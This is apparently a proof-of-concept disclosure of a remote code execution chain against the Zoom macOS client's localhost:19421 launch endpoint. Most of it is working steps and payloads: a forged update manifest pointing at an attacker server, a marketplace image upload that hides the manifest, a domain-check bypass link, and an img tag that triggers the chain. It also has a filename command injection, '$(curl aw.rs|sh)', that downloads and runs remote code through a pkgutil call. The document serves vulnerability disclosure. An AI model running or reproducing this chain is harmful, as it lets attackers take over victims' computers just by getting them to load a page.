POC - https://youtu.be/zGSLBDo3N7s
- Create a malicious update manifest with the
Package-url
pointing a server you control:
Check-sum=11111111111111111111111111111111;Check2-sum=11111111111111111111111111111111;Update-Option=1;Current-version=5.4.53932.0709;Download-root=https://aw.rs/z;Package-url=https://aw.rs/z/5.4.53932.0709/zoomusInstaller.pkg?t=atupg;Package-name=zoomusInstaller.pkg;Installer-name=;ahcab-name=airhost.zip;sipcab-name=sipcall.zip;codesnippet-name=codesnippet_mac.zip;fullcab-name=zoomusInstallerFull.pkg;
-
Upload the manifest it to a
.zoom.us
domain, one example is as the icon for a new https://marketplace.zoom.us/ app (there are client side checks to see if it's an image but they can be bypassed): https://marketplacecontent.zoom.us//sMLaMgPKSw2SAfIfpYV1Eg/zqJOtwryQkyO_UMykn2OdA/app/4yr1OelsSIGCMOj5CvI1JQ/ZAS3dFjlS8W0jJt48Dy9fA.jpg -
Use
.htaccess
(or any other method) to change the filename of the malicious package pointed to byPackage-url
in the manifest:
Header set Content-Disposition 'attachment; filename="aaaa$(curl aw.rs|sh).pkg"'
-
Create a malicous link to hit the local zoom webserver. To bypass the domain checks it must be a valid subdomain for zoom.us and also end with
zoom.us
. This is still allows use to create a link to our manifest hosted on marketplacecontent.zoom.us:http://localhost:19421/launch?domain=marketplacecontent.zoom.us//sMLaMgPKSw2SAfIfpYV1Eg/zqJOtwryQkyO_UMykn2OdA/app/4yr1OelsSIGCMOj5CvI1JQ/ZAS3dFjlS8W0jJt48Dy9fA.jpg?.zoom.us
-
Create an image with the link and host is somewhere:
<img src="http://localhost:19421/launch?domain=marketplacecontent.zoom.us//sMLaMgPKSw2SAfIfpYV1Eg/zqJOtwryQkyO_UMykn2OdA/app/4yr1OelsSIGCMOj5CvI1JQ/ZAS3dFjlS8W0jJt48Dy9fA.jpg?.zoom.us">
The RCE is possible due to the download url being created with:
[NSString stringWithFormat:@"https://%@/upgrade?os=mac", domain]
This allows for any link to be created, it just needs to be a valid subdomain (host
is checked on the generated url) and also end with a valid subdomain.
After downloading the manifest, the package is downloaded and the signature is checked with:
NSString *cmd = [NSString stringWithFormat:@"pkgutil --check-signature \"%@\"", filename];
[cmd runAsCommand]
This allows for trivial command injection in via a malicious filename